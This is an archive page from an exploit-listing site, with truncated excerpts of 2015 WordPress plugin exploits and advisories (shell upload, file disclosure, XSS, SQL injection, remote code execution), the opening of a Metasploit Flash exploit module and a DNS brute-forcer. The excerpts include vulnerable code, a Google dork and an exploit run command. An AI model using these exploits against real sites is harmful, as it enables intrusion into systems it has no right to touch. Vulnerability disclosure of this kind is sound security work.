Tags archives: unix

 


WordPress InBoundio Marketing Shell Upload

<?php
# [ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]
[...]

 


WordPress MP3-Jplayer 2.1 Local File Disclosure

<?php
# [ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]
[...]

 


WordPress AB Google Map Travel CSRF / XSS

===============================================================================
CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin
===============================================================================

.. contents:: Table Of Content

Overview
========

* Title: Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/
* Severity: HIGH
* Version Affected: Version 3.4 and mostly [...]

 


WordPress Ajax Search Pro Remote Code Execution

------------------------------------------------------------------------------
WordPress ajax-search-pro Plugin Remote Code Execution
------------------------------------------------------------------------------

[-] Plugin Link:

http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410

also affected:
https://wordpress.org/plugins/ajax-search-lite/
https://wordpress.org/plugins/related-posts-lite/

[-] Vulnerability Description:

This vulnerability allows any registered user to execute arbitrary functions

vulnerability code:

    add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
    if (!function_exists("wpdreams_ajaxinputcallback")) {
        function wpdreams_ajaxinputcallback() {
            $param = $_POST;
            echo call_user_func($_POST['wpdreams_callback'], $param);
            exit;
        }
    }

[...]

 


WordPress Reflex Gallery 3.1.3 Shell Upload

<?php

/*
# Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
# TYPE: Arbitrary File Upload
# Google DORK: inurl:"wp-content/plugins/reflex-gallery/"
# Vendor: https://wordpress.org/plugins/reflex-gallery/
# Tested on: Linux
# Version: 3.1.3 (Last)
# EXECUTE: php exploit.php www.alvo.com.br shell.php
# OUTPUT: Exploit_AFU.txt
# POC http://i.imgur.com/mpjXaZ9.png
# REF COD http://1337day.com/exploit/23369

--------------------------------------------------------------------------------
<form method = [...]

 


Adobe Flash Player PCRE Regex Logic Error

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000'

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'        => "Adobe Flash Player PCRE Regex Vulnerability",
      'Description' => %q{
        This module exploits a vulnerability found in Adobe [...]

 


DNS Spider Multithreaded Bruteforcer 0.6

#!/usr/bin/env python2
# -*- coding: latin-1 -*-
[...]

 


WordPress Daily Edition Theme 1.6.2 Cross Site Scripting

*WordPress Daily Edition Theme v1.6.2 XSS (Cross-site Scripting) Security Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id Parameters XSS Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.* v1.5.* v1.4.* v1.3.* v1.2.* v1.1.* v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Cross-Site Scripting [...]

 


WordPress Huge IT Slider 2.6.8 SQL Injection

Advisory ID: HTB23250
Product: Huge IT Slider WordPress Plugin
Vendor: Huge-IT
Vulnerable Version(s): 2.6.8 and probably prior
Tested Version: 2.6.8
Advisory Publication: February 19, 2015 [without technical details]
Vendor Notification: February 19, 2015
Vendor Patch: March 11, 2015
Public Disclosure: March 12, 2015
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-2062
Risk Level: Medium
CVSSv2 [...]

 


WordPress Pie Register 2.0.14 Cross Site Scripting

[+]Title: Wordpress Pie Register Plugin 2.0.14 - XSS Vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 09/03/2015
[+]Type:WebApp
[+]Risk:High
[+]Affected Version:All
[+]Overview:
Pie Register 2.x suffers from an XSS vulnerability.

[+]Proof Of Concept:

[PHP]
global $piereg_dir_path;
include_once( PIEREG_DIR_NAME."/classes/invitation_code_pagination.php");

if(isset($_POST['notice']) && $_POST['notice'] ){
    echo '<div id="message" class="updated fade"><p><strong>' . $_POST['notice'] . '.</strong></p></div>';
}elseif(isset($_POST['error']) && $_POST['error'] ){
[...]